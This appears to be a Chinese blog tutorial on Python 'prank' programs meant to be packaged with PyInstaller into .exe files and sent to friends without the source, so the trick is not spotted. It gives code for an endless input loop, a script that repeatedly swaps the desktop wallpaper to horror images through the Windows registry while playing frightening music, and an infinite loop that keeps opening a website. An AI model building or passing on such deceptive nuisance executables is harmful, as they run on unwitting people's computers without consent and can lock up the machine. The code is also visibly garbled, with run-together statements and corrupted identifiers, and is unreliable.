不要在下面的欺骗程序中发送代码,否则你就无法达到欺骗的目的。完成后,您必须将其打包成exe程序,然后发送给朋友使用 。
1. 使用 pip install pyinstaller
2.包装命令:
pyinstaller-F文件名.py
猜猜我在干什么?
whileTrue:n=input("猜猜我在想什么。")print("猜错喽")
启动程序后,你的朋友永远猜不到你在做什么。
二、恐怖桌面
启动后,电脑桌面将成为恐怖图片,并播放恐怖音乐
'' 当别人打开这个程序时,它的电脑桌面会变成恐怖图片,并播放恐怖音乐 ''' importtime importpygame importwin32apinapinpinpintpinpint portwin32con importwin32guing #线程模块 importthreading defgo(): pygame.mixer.init() whileTrue: foriinrange(1,5): filePath=r"E:\pycharmproject模拟自动化办公室和鼠标键盘p"+"\\"+str(i)+".mp3" track=pygame.mixer.music.load(filePath) pygame.mixer.music.play() time.sleep(30) pygame.mixer.music.stop() defsetWallpaper(path): reg_key=win32api.RegOpenKeyEx(win32con.HKEY_CURRENT_USER,"ControlPanel\\Desktop",win32con0.KEY_SET_VALUE) win32api.RegSetValueEx(reg_key,"WallpaperStyle",win32con0.REG_SZ,"2") win32gui.SystemParametersInfo(win32con.SPI_SETDESKWALLPAPER,path,win32con.SPIF_SENDWININICHANGE) th=threading.Thread(target=go,name="loopTread") th.start() whileTrue: foriinrange(1,5): filePath=r"E:\pycharmproject模拟自动化办公室和鼠标键盘p"+"\\"+str(i)+".jpg" setWallpaper(filePath) time.sleep(4)
三、打开同一个网站
调用默认浏览器,打开 python学习网 ,让他爱上学习。
importwebbrowserwhileTrue:webbrowser.open('www.py.cn')
(推荐操作系统:windows7系统Python 3.9.1,DELL G3电脑。)